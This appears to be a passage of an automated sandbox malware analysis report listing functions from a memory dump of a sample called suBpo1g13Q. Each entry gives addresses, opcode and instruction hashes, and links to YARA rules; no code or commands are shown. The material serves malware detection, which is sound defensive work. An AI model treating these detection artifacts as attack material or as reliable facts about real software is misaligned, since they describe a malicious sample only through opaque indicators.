                                                                                                                • Opcode ID: 59781b4602ee29e39a0e696eb1aeae1a3920539a4fb3c0709173efb3672bf303
                                                                                                                • Instruction ID: c2a2405ded65429013ace688394238d7833f64b353b615d69d52434d5c292c80
                                                                                                                • Opcode Fuzzy Hash: 59781b4602ee29e39a0e696eb1aeae1a3920539a4fb3c0709173efb3672bf303
                                                                                                                • Instruction Fuzzy Hash: 51F0A933641611B7C732DF57CD40F57BAAAFBA4A90F15402EA60597660D670ED01D6B0
                                                                                                                Function 014CC073 Relevance: .0, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                • Instruction ID: 4a6da8c5b4c415a6dda196a69295bf5ae1e5e10e79468c170d31498e2f0e9ab7
                                                                                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                • Instruction Fuzzy Hash: 7AF0C2F2600611ABD324CF8EDC80E57FBEADBD1A90F04812DA509CB320EA31ED04CB90
                                                                                                                Function 0157634F Relevance: .0, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5e21a3fff47e622caded41b3c548b12240befb613d0e141b21420a0f7329dbe8
                                                                                                                • Instruction ID: f3051c3cd2937e7620d2de0a602d2d3dde72bbcbfb41c2c3ddc854f792cbbfd1
                                                                                                                • Opcode Fuzzy Hash: 5e21a3fff47e622caded41b3c548b12240befb613d0e141b21420a0f7329dbe8
                                                                                                                • Instruction Fuzzy Hash: 61018F71A10209EFDB00DFAAE441AAEBBF8FF58300F10406AF900EB350D6349A01CBA0
                                                                                                                Function 0149C310 Relevance: .0, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                • Instruction ID: 6c777bec1bbe253225f4be0981e3675bb02c86abbc4cc6dc208b4f27f851fb9d
                                                                                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                • Instruction Fuzzy Hash: B7F0FC732046639BDF321B9A48C0B6BAD958FE5A64F19003BE20D9B364C9708D0256D0
                                                                                                                Function 0157625D Relevance: .0, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b13631faf4d185ce1a20a478a843748cacf2d55f56ca0645e4c27b9b4cb8a63d
                                                                                                                • Instruction ID: 817858781ae73955176c1a0f302528a6b97608a351730fadb7fdefe460a45666
                                                                                                                • Opcode Fuzzy Hash: b13631faf4d185ce1a20a478a843748cacf2d55f56ca0645e4c27b9b4cb8a63d
                                                                                                                • Instruction Fuzzy Hash: 9F018471A00209EFDB04DFA9E4419AEB7F8FF58300F14405AF904EB350D6749A01CBA0
                                                                                                                Function 015762D6 Relevance: .0, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 273d72250c52258e5521758dbf90602569bdbbc3c0172e0b42e14cefb96b3921
                                                                                                                • Instruction ID: ae8d6f567c79a97f333de23b751babd05ca0a2cef43a6d3e62f8566839494aba
                                                                                                                • Opcode Fuzzy Hash: 273d72250c52258e5521758dbf90602569bdbbc3c0172e0b42e14cefb96b3921
                                                                                                                • Instruction Fuzzy Hash: 41012171A00209AFDB04DFA9E445DAEBBF8FF58704F55445AE914EB350D6749A01CBA0
                                                                                                                Function 014DCA6F Relevance: .0, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                • Instruction ID: 1de9512866db428005f945c69964aa31d902be8fb23390cabc08b259b8942ca0
                                                                                                                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                • Instruction Fuzzy Hash: 4C01D6326406859BEB33DA5DC845B59BBD8FF52754F09446AFA048F7A1DAB4C801C211
                                                                                                                Function 015761E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: de09a1b3c471f02da6d72fd30c6a36adb1d8d94b2c31b5d1f55426a82b172d5c
                                                                                                                • Instruction ID: 3ac1e926e4809bdc488693cbce6c28bb8125c7ac042fe12376f162d345fac8b1
                                                                                                                • Opcode Fuzzy Hash: de09a1b3c471f02da6d72fd30c6a36adb1d8d94b2c31b5d1f55426a82b172d5c
                                                                                                                • Instruction Fuzzy Hash: DA018471A002499BDB00DFAAE845AEEBBF8BF54310F14005AE500EB290D734DA01CB54
                                                                                                                Function 0152A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 75f584d904773f85132558011d07956937d8d0cac7ca1b5ea7986b63a4fd6019
                                                                                                                • Instruction ID: 39ccb33e6aaa607ab9a7a5a91a13c6412b8a2614910689aaa63b573d0b3c6756
                                                                                                                • Opcode Fuzzy Hash: 75f584d904773f85132558011d07956937d8d0cac7ca1b5ea7986b63a4fd6019
                                                                                                                • Instruction Fuzzy Hash: F2018936210119ABCF129E84D840EDE7F66FB4C654F068105FE186A660C336D970EB81
                                                                                                                Function 0149C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 42c644fea24903c746a366eb1662e098bc19d5a3af39c3a84072cf6afd5b073f
                                                                                                                • Instruction ID: 66a34dc86d8839e3bf7fee219ec24e11e3bdeaf3751e1ad7f88cf3a9f3b3a2ec
                                                                                                                • Opcode Fuzzy Hash: 42c644fea24903c746a366eb1662e098bc19d5a3af39c3a84072cf6afd5b073f
                                                                                                                • Instruction Fuzzy Hash: 8CF02BB12042415BFB1096198C42F633A95E7D0651F65802BEB058B7F1EA70DC018B98
                                                                                                                Function 014D656A Relevance: .0, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 13d41962041a262559e73844238f980ac4614a2df17e8472ba5192a7170f6efc
                                                                                                                • Instruction ID: f7b03e966e52483415fcb5e2b60fcb48bd378c4b2946c9e3ef3d1068fdefe947
                                                                                                                • Opcode Fuzzy Hash: 13d41962041a262559e73844238f980ac4614a2df17e8472ba5192a7170f6efc
                                                                                                                • Instruction Fuzzy Hash: 030186706006819BFB239B2DDD68F6937D8BB51B00F460556B9158F6E6D778D4828210
                                                                                                                Function 0154437C Relevance: .0, Instructions: 37COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                • Instruction ID: 5fe0812ac5fa5d0803b037569a4e57f479c558251e4bd5ae6465f5fe2d47a2e3
                                                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                • Instruction Fuzzy Hash: B8F0E93638191347EB76AA2E8420B2EA6A5BFA0D14B15052DA542CF650DF30DC808790
                                                                                                                Function 0152E872 Relevance: .0, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                • Instruction ID: 2dd6bbdb878c0aa115a42ef06526d2664c989023aa387e3114acaddf6f5eb45c
                                                                                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                • Instruction Fuzzy Hash: 9DF054337115219BD3219E4ECC81F16B7B8FFD6A60F190469E6449F2A4C7B0EC0287E0
                                                                                                                Function 0152C89D Relevance: .0, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 99a98f030d61327a40177850c1b60ae359a079ebd76318bd22dc6b9114643f12
                                                                                                                • Instruction ID: bcf55f63da126f98b45630e9fd43519d611547aeb2472b7fd25a0ed9a0c8a1a5
                                                                                                                • Opcode Fuzzy Hash: 99a98f030d61327a40177850c1b60ae359a079ebd76318bd22dc6b9114643f12
                                                                                                                • Instruction Fuzzy Hash: 4CF0FF716043049FC310EF29C845A1EBBE4FFA9710F408A5EB898CB390E634EA00C792
                                                                                                                Function 014D0854 Relevance: .0, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                • Instruction ID: 6236ef55c0fa081b23141bc2c01b269070295775f9590cd86436c51e93202b89
                                                                                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                • Instruction Fuzzy Hash: 23F0E972610204AFEB15DF26CC01F96B7E9EFA8350F14807DA545D7270FAB0ED01C664
                                                                                                                Function 0152C912 Relevance: .0, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6b36b0266451ff4dc343c7c326c6b292e0b8a7c71f2d919f65904eb9777ef17a
                                                                                                                • Instruction ID: 0bbff623eef5e33b8fbd845d1c39279ef5509757624320e212db938ba7cafcd4
                                                                                                                • Opcode Fuzzy Hash: 6b36b0266451ff4dc343c7c326c6b292e0b8a7c71f2d919f65904eb9777ef17a
                                                                                                                • Instruction Fuzzy Hash: 0CF0AF70A00209AFDB04EF6AC555AAEB7F4FF28300F00805AA815EB395DA34EA01CB50
                                                                                                                Function 014A47FB Relevance: .0, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e63ea2cb5b7bc8ecbe151b74ca9609840e7e5d78661166019bcd5d3938a57f7e
                                                                                                                • Instruction ID: 9086cfb29bf7d24498807f02c6aff23e0301fb2d67d2dacd5f122924e56f1e43
                                                                                                                • Opcode Fuzzy Hash: e63ea2cb5b7bc8ecbe151b74ca9609840e7e5d78661166019bcd5d3938a57f7e
                                                                                                                • Instruction Fuzzy Hash: 15F02B399122D18FE732C71CE044B9B77D49B20B30F8E586FC54587632C3B0E840C611
                                                                                                                Function 01560115 Relevance: .0, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 50f3e3dae6c7d336f7d3733c92d8b9e356ea02e21369bd6d7c0a41f95aebb762
                                                                                                                • Instruction ID: 36edf8b10a8284c90163904f2c1642049fb0dc843f75b16269a76f8312b26363
                                                                                                                • Opcode Fuzzy Hash: 50f3e3dae6c7d336f7d3733c92d8b9e356ea02e21369bd6d7c0a41f95aebb762
                                                                                                                • Instruction Fuzzy Hash: 6FF05C374196C286CF725B3CBC603E97F68B781014F0B1446E8B15F249C674848BD3A1
                                                                                                                Function 014DC5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f6a4ba72ff1a8f5813d31f6485f82dc31c3267f5453af4c97465dddbae52ee24
                                                                                                                • Instruction ID: 7d63c1934e204c45742eb8bb5cd56cf1439c5f2eb535ef0d527245b4b53106e9
                                                                                                                • Opcode Fuzzy Hash: f6a4ba72ff1a8f5813d31f6485f82dc31c3267f5453af4c97465dddbae52ee24
                                                                                                                • Instruction Fuzzy Hash: 00F0E2715116519FEF22971CC1E8B52BBE4EB45BA0F1C942FE50E87632C370E882CA91
                                                                                                                Function 014E2619 Relevance: .0, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                • Instruction ID: d6615edf7d73137e874d2fd4ffd7e6d921fbb1ad4d575cab424584ad42f71998
                                                                                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                • Instruction Fuzzy Hash: 63E092723406012BE7129F5A8CC4F477BAE9FA2B11F04047EB5045E2A2C9F29D0986A4
                                                                                                                Function 01536030 Relevance: .0, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                • Instruction ID: eff0a7d1122409372a0297fc746de5e56c498e5d8a01f15c00c8557057b22845
                                                                                                                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                • Instruction Fuzzy Hash: 1EF03072104204AFE3218F0AD985F56F7F8FB55364F45C42AE6099F561D37AED40CBA4
                                                                                                                Function 014A0710 Relevance: .0, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                • Instruction ID: 2ca1ad1ffb1291a5c97438fb2413cdeaf78f60f53dbcb951f74c30970288fdca
                                                                                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                • Instruction Fuzzy Hash: CCF0E5392043459BEB16CF1AC050AD57FA8FB61390F02006AFD468B331D731E982CB51
                                                                                                                Function 014D49D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                • Instruction ID: 06aadec3a1507a52481e9602731672e3185e5822bfcd0b502ed1050ff50b14a1
                                                                                                                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                • Instruction Fuzzy Hash: 3BE0D832344145ABDB311A598810B6777A5DBE07A0F1A042BE2408BB74DB70DC41C7E9
                                                                                                                Function 01574164 Relevance: .0, Instructions: 27COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7d7a12ad95b1ffa1f3787f6c6f2a18c87e44ef5787ee3569baa7a2c48ce28edb
                                                                                                                • Instruction ID: 5a4911243bfc8b471bdbbd24095acb79abbf56baa5db3ca124adcfec59b864f3
                                                                                                                • Opcode Fuzzy Hash: 7d7a12ad95b1ffa1f3787f6c6f2a18c87e44ef5787ee3569baa7a2c48ce28edb
                                                                                                                • Instruction Fuzzy Hash: 39F06531A256D14FE772E72CF689B5D77E4BB50A30F1A4555D4058F912C724DC41C650
                                                                                                                Function 0154678E Relevance: .0, Instructions: 27COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                • Instruction ID: 8deb57fa941c662244fc7be57d3625bb85bdaac8fd5efbce0824e7c0682635ef
                                                                                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                • Instruction Fuzzy Hash: 90E0D832640210BBDB2197598D11F9ABEBCEB60EA4F150055B600DB0A4D530DE00C690
                                                                                                                Function 015708C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                • Instruction ID: b9ee1d43eb8848f8b3c4989ab3b0c1140d668ed700ce979f5b16c74652f9cfce
                                                                                                                • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                • Instruction Fuzzy Hash: 0AE09B716407508BCB258A1DD142A57B7E8FFD6760F15806DE9054B653C231F842C6D0
                                                                                                                Function 014A25E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: f598f42732fd36363078ce50f45c0cd5cfd820132de3924bed108080c190d2f5
                                                                                                                • Instruction ID: b75271e69f084cbd512aa1ef891bbbefe20f73a17fb92b18f6bbe692adcf517d
                                                                                                                • Opcode Fuzzy Hash: f598f42732fd36363078ce50f45c0cd5cfd820132de3924bed108080c190d2f5
                                                                                                                • Instruction Fuzzy Hash: E7E092321005549BC721BF2BDD01F8A77AAEB70360F06451AB1155B1A0CA70A910C7D4
                                                                                                                Function 0155A456 Relevance: .0, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                • Instruction ID: 06b82ce5ed89966c3f361d6ddb0f11af8b482f0ef5ac9f3f9764f749c4b7b5b2
                                                                                                                • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                • Instruction Fuzzy Hash: 78E09231010612DFEB726F6BC868B567EE0BFA0711F148D2EA096164B0C7B598C1CA40
                                                                                                                Function 01524000 Relevance: .0, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                • Instruction ID: 8360b8c42f9d447e39275cc09190a388daa99c52fceb82d05dd67aa7dcf027c2
                                                                                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                • Instruction Fuzzy Hash: 01E0C2353003158FE715CF1AC040B667BB6BFD6A10F28C068E9488F245EB36E882CB40
                                                                                                                Function 014DCA38 Relevance: .0, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dfcdf4e10516cf46a07d69fc0525533f6056ecb71d76af154da00c76f84b4b0f
                                                                                                                • Instruction ID: 310c405fa7b4a8b754a1a26c8a699e7339bb9a293b62aa870dda2f7be51fae9c
                                                                                                                • Opcode Fuzzy Hash: dfcdf4e10516cf46a07d69fc0525533f6056ecb71d76af154da00c76f84b4b0f
